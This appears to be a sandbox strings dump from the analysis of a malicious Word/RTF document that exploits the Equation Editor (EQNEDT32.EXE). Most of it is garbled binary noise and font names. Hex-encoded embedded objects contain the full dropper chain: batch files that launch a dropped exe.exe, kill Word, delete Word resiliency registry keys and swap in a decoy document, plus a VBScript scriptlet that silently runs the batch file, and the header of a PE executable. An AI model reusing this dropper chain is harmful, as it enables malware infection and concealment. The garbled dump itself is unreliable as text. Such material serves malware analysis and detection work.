42@J!k&!#ayV+#MeBn(5&NunX-U=FUM8UP x4x@74x@2xXlm(5*_M]/#7PSvtW8PcRG`#8M#8M#p'[JM7To_hAY@a)

Ansi based on Dropped File (~WRC0000.tmp)

563sD_s_3;

Ansi based on Image Processing (screen_3.png)

5B A?8A:0R/Rx03>;>2>: 3 =0:5CJOJPJQJ\aJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O

Ansi based on Dropped File (decoy.doc)

5Ä35cFJ53_J3

Ansi based on Image Processing (screen_3.png)

6iD_,|uZ^ty;!Y,}{C/h>PK!-t:Mword/_rels/document.xml.rels (OO0&~V5fa/jWx)%.$Iuz^+X,X-MZ,bNEi4Ddd} FhXNT_s2Jojx-/`m_MoFns%M6Jn|@G r'C)l;NVs"paq*5hT|Wp9RS>*lMqG8F:CN/J(lMk.dRFS"veoDKSsBK;>PK!word/document.xmlTn0}0I0a>(YJ }E_D9o%NjkeF~!TT9sGnWvM>BT4nK*

Ansi based on Dropped File (~WRC0000.tmp)

6J+q<b?{JIx#5t0Fbnud<F}F(j(iQa~T<,22HVlt`lW'__0/Y;x'gJBp=i;GD]:g1_Ht<:?W|PK!kldocProps/app.xml (RMo0Ozi&d&>n-M$ sN-'~y~fOER1BG[>*Q0 [DSPR0[J]&x`xh*FB}/iee6`%vN=.6

Ansi based on Dropped File (~WRC0000.tmp)

7_?m-{UBw<w_$#[8{(/$0hF{L)#7i%=A:s$),Qg20ppf

Ansi based on Dropped File (~WRC0000.tmp)

7V8a8

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

8A8LJ $zr10X<zCR/|TOS=#k*6"6xj]wkJo~^s+"}PK!GVm|word/glossary/document.xmlYMo8/=0D}ni*PI$9#Yrh6)FrpH|<>R/?Mfagb.r5w:MEizm$VtSTtMM6EYZ.S\f^z1RU4

Ansi based on Dropped File (~WRC0000.tmp)

8cT;?t.bt{c9GK$+0?C~Se6X~.!;[rTu!]19X"|PJf]M

Ansi based on Dropped File (~WRC0000.tmp)

8PK!Tctheme/theme/theme1.xmlY7w}L~VLha@7q2f=h!$WiUV(R^TUW*UQUWXg2/,+*]iw|9g>{+N8aq-*GlLi63~pmGo

Ansi based on Dropped File (decoy.doc)

8T~;Y`']O4G

Ansi based on Dropped File (~WRC0000.tmp)

9;^f&5ZDZF{J7 @D4x#@74x#@2x#XdmZoHBU]7i+

Ansi based on Dropped File (~WRC0000.tmp)

9AMFPioKBJ5x#@74x#@74x#@2x#XdmZo,ToHBWoox#(nR,rj,+~RK7%q8#8

Ansi based on Dropped File (~WRC0000.tmp)

:._---_-

Ansi based on Image Processing (screen_3.png)

; qc?P

Ansi based on Dropped File (decoy.doc)

;-________

Ansi based on Image Processing (screen_3.png)

;:5A-;@5V)Iqj&x4x@74x@2xXlm(5*[JPU 6o]vMSR,vjR,M+q<G#8M

Ansi based on Dropped File (~WRC0000.tmp)

;;(52<b1Xb)Ukny

Ansi based on Dropped File (~WRC0000.tmp)

;@M&P{I%xX'

Ansi based on Dropped File (~WRC0000.tmp)

;B<";e3y#S(C!oP?N 7

Ansi based on Dropped File (~WRC0000.tmp)

;D~<t_'H(NiU yb9,a%5]HZ_ww<H7vBw5?

Ansi based on Dropped File (decoy.doc)

<![CDATA[

Ansi based on Dropped File (inteldriverupd1.sct)

<)?>?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

<-<<<N<]<w<

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

<-I=9 o^4A5rx%ibibC6O9t86SJhhd[w[g<bRO6Iva$Lfx8t{+M$R<~]$#\);+B`n?Ix,7-A.iTHQ?2+}Cv Ji$Px_OJMeX3L6Kv}!:$R~.i7I,'3}{x5*_Y2!"~"k0O D&6g}0Q1p6\eu>'9a3Amm+F<Wc_!ha8HfXPK!Nword/glossary/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^

Ansi based on Dropped File (~WRC0000.tmp)

</registration>

Ansi based on Dropped File (inteldriverupd1.sct)

</script>

Ansi based on Dropped File (inteldriverupd1.sct)

</scriptlet>

Ansi based on Dropped File (inteldriverupd1.sct)

<06?*_~.?PK!(^=word/stylesWithEffects.xmlmS8}CH4P3m60Z|~ pV;wcUcoWa<$2Z'}=,GNg}^KSD6&$6<dq(Dr{2Zx|?LOOq"=@bK\&ck-eL&!K,+lfp:\I#=\3ZzyL'8)]z

Ansi based on Dropped File (~WRC0000.tmp)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

Ansi based on Dropped File (decoy.doc)

<?XML version="1.0"?>

Ansi based on Dropped File (inteldriverupd1.sct)

<?XML version="1.0"?><scriptlet><registration description="fjzmpcjvqp" progid="fjzmpcjvqp" version="1.00" classid="{204774CF-D251-4F02-855B-2BE70585184B}" remotable="true"></registration><script language="VBScript"><![CDATA[Set ObjShell = CreateObject("WScript.Shell") ObjShell.Run "CmD /C %TeMp%\TaSk.BaT",0,True Set ObjShell = Nothing </script></scriptlet>

Ansi based on Dropped File (inteldriverupd1.sct)

<^'CT#

Ansi based on Dropped File (~WRC0000.tmp)

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

Ansi based on Dropped File (decoy.doc)

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

<registration

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (inteldriverupd1.sct)

Ansi based on Dropped File (inteldriverupd1.sct)

= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM

Ansi based on Dropped File (decoy.doc)

=2>D>h>

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

=k<*2KrhG#

Ansi based on Dropped File (~WRC0000.tmp)

>'?O?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

>/1.Ubjbjnn.aa0JLLLLLL:LLaJJ`Oz6w0&@LLmg:

Ansi based on Dropped File (decoy.doc)

>1E?nb_~bm@

Ansi based on Dropped File (~WRC0000.tmp)

>Root EntryFpMl7Ole

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

?&?0?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?8?I?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?`?i?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?T?b?m?

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

?v__?_

Ansi based on Image Processing (screen_0.png)

@"CzyTy

Ansi based on Dropped File (~WRC0000.tmp)

@%SystemRoot%\system32\packager.dll,-2000

Unicode based on Runtime Data (WINWORD.EXE )

@.data

Ansi based on Dropped File (exe.exe.634531026)

@.rsrc

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

@Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

@Batang

Unicode based on Runtime Data (WINWORD.EXE )

@BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

@DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

@Dotum

Unicode based on Runtime Data (WINWORD.EXE )

@DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

@FangSong

Unicode based on Runtime Data (WINWORD.EXE )

@Gulim

Unicode based on Runtime Data (WINWORD.EXE )

@GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

@Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

@GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

@KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

@LT\dFijiNormal.dotmFiji17Microsoft Office Word@0@Bu@<z;.+,0hp|

Ansi based on Dropped File (decoy.doc)

@Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@SimHei

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@}w7c(EbCA7K

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 30.49.48.1, Tuesday, March 13, 2018 19:54:47

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:11:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:13:44

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:21:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:30:20

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:36:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:38:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: ARP Attack] from source: 98.122.0.1, Tuesday, March 13, 2018 19:59:16

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:13:17

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:21:59

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:25:03

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:32:32

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:37:17

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:42:23

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:05

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:56:31

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 144.76.237.113, port 80, Tuesday, March 13, 2018 19:58:34

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:23:16

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:40:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 37.182.9.32, port 80, Tuesday, March 13, 2018 19:53:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:11:29

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:13:41

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:44:57

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:50:46

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 69.195.124.205, port 80, Tuesday, March 13, 2018 19:57:46

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:16:07

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:22:39

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:23:36

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:28:06

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:32:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:42:40

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:44:59

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:53:49

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 19:56:15

Ansi based on Dropped File (decoy.doc)

[DoS Attack: SYN/ACK Scan] from source: 72.167.1.128, port 80, Tuesday, March 13, 2018 20:02:37

Ansi based on Dropped File (decoy.doc)

[DoS Attack: TCP/UDP Chargen] from source: 184.105.139.117, port 15283, Tuesday, March 13, 2018 19:58:53

Ansi based on Dropped File (decoy.doc)

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D3BBA56FE78C40][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D3BBA56FEDA6C0][O00000000]*C:\5635DF453843.doc

Unicode based on Runtime Data (WINWORD.EXE )

[OptionsTextENG]

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

[Yyj2> U^4^2XKqA[Z,l9ry+|.-?#[r]v;xY`u[Hm'3Fr)PK!^word/glossary/fontTable.xmlA0"8!lhjEKq<)8@1?4 HhnR

Ansi based on Dropped File (~WRC0000.tmp)

\*/UTz`mTqAStne{uFLY#Gbt.gi<s~|p[21_ L|o'Ld}|kOr:c> $O%:$YRPK!712qdocProps/core.xml (RAn0W"BUV7^%-}Rwgv4;lr

Ansi based on Dropped File (~WRC0000.tmp)

\bin2633OLE2Link

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\layout.inf

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

\objdata 0105000002000000080000005061636b6167650000000000000000002e01000002007461736b2e62617400433a5c496e74656c5c7461736b2e626174000000030012000000433a5c496e74656c5c7461736b2e62617400930000004543484f204f46460d0a7365742075753d2225544d70255c626c6f636b2e747874220d0a494620455849535420257575252028657869742920454c534520287365742075753d2225544d70255c626c6f636b2e74787422202620636f7079204e554c20257575252026207374617274202f622025544d70255c326e642e626174290d0a44656c2022257e6630220d0a657869741100000043003a005c0049006e00740065006c005c007400610073006b002e00620061007400080000007400610073006b002e006200610074001100000043003a005c0049006e00740065006c005c007400610073006b002e006200610074000105000000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata 0105000002000000080000005061636b616765000000000000000000720900000200326e642e62617400433a5c496e74656c5c326e642e626174000000030011000000433a5c496e74656c5c326e642e62617400e00800004543484f204f46460d0a54494d454f555420310d0a7374617274202554654d70255c4578452e4578450d0a7461736b6b696c6c202f66202f696d2057694e774f72442e4578450d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c382e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c392e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c31302e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c31312e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c31322e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c31342e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c31352e305c576f72645c526573696c69656e6379202f660d0a7265672064656c65746520484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c4f66666963655c31362e305c576f72645c526573696c69656e6379202f660d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c382e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202554654d70255c4465436f592e446f432022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c392e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c31302e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c31312e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c31322e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c31342e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c31352e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a666f72202f662022746f6b656e733d312a2064656c696d733d5c2a222025256120696e2028275245472051554552592022484b45595f43555252454e545f555345525c534f4654574152455c4d6963726f736f66745c4f66666963655c31362e305c576f72645c46696c65204d525522202f7620224974656d203122272920646f207365742022417070506174683d25257e62220d0a636f7079202574656d70255c6465636f792e646f632022254170705061746825220d0a22254170705061746825220d0a44654c2025544d70255c626c6f636b2e5478540d0a44654c2025544d70255c696e74656c647269766572757064312e5363540d0a44654c2025544d70255c6465636f792e446f431000000043003a005c0049006e00740065006c005c0032006e0064002e006200610074000700000032006e0064002e006200610074001000000043003a005c0049006e00740065006c005c0032006e0064002e006200610074000105000000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata 0105000002000000080000005061636b61676500000000000000000092ca000002006578652e65786500433a5c496e74656c5c6578652e657865000000030011000000433a5c496e74656c5c6578652e6578650000ca00004d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000000000000000000000000000040000000504500004c010400267b2c5a0000000000000000e0000f010b01070a008a0000003e000000000000b41500000010000000a00000000040000010000000020000040000000000000004000000000000000000010000020000a89a0100020000000000100000100000000010000010000000000000100000000000000000000000dcb300002800000000f00000cc060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006c0000000000000000000000000000000000000000000000000000002e74657874000000bf88000000100000008a000000020000000000000000000000000000200000602e726461746100007816000000a0000000180000008c0000000000000000000000000000400000402e64617461000000602e000000c000000016000000a40000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata 0105000002000000080000005061636b616765000000000000000000a468000002006465636f792e646f6300433a5c496e74656c5c6465636f792e646f63000000030013000000433a5c496e74656c5c6465636f792e646f630000680000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000002f00000000000000001000003100000001000000feffffff000000002e000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata 0105000002000000080000005061636b616765000000000000000000a50200000200696e74656c647269766572757064312e73637400433a5c496e74656c5c696e74656c647269766572757064312e73637400000003001d000000433a5c496e74656c5c696e74656c647269766572757064312e73637400a70100003c3f584d4c2076657273696f6e3d22312e30223f3e0d0a3c7363726970746c65743e0d0a0d0a3c726567697374726174696f6e0d0a202020206465736372697074696f6e3d22666a7a6d70636a767170220d0a2020202070726f6769643d22666a7a6d70636a767170220d0a2020202076657273696f6e3d22312e3030220d0a20202020636c61737369643d227b32303437373443462d443235312d344630322d383535422d3242453730353835313834427d220d0a2020202072656d6f7461626c653d2274727565220d0a093e0d0a3c2f726567697374726174696f6e3e0d0a0d0a3c736372697074206c616e67756167653d225642536372697074223e0d0a3c215b43444154415b0d0a0909536574204f626a5368656c6c203d204372656174654f626a6563742822575363726970742e5368656c6c2229200d0a09094f626a5368656c6c2e52756e2022436d44202f43202554654d70255c5461536b2e426154222c302c54727565200d0a0909536574204f626a5368656c6c203d204e6f7468696e67090d0a5d5d3e0d0a3c2f7363726970743e0d0a0d0a3c2f7363726970746c65743e1c00000043003a005c0049006e00740065006c005c0069006e00740065006c0064007200690076006500720075007000640031002e007300630074001300000069006e00740065006c0064007200690076006500720075007000640031002e007300630074001c00000043003a005c0049006e00740065006c005c0069006e00740065006c0064007200690076006500720075007000640031002e007300630074000105000000000000

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata \mmath

Ansi based on Hybrid Analysis (5635DF453843.doc.bin)

\objdata \mmath\bin-00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000B024837CC473D30103000000C00300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFF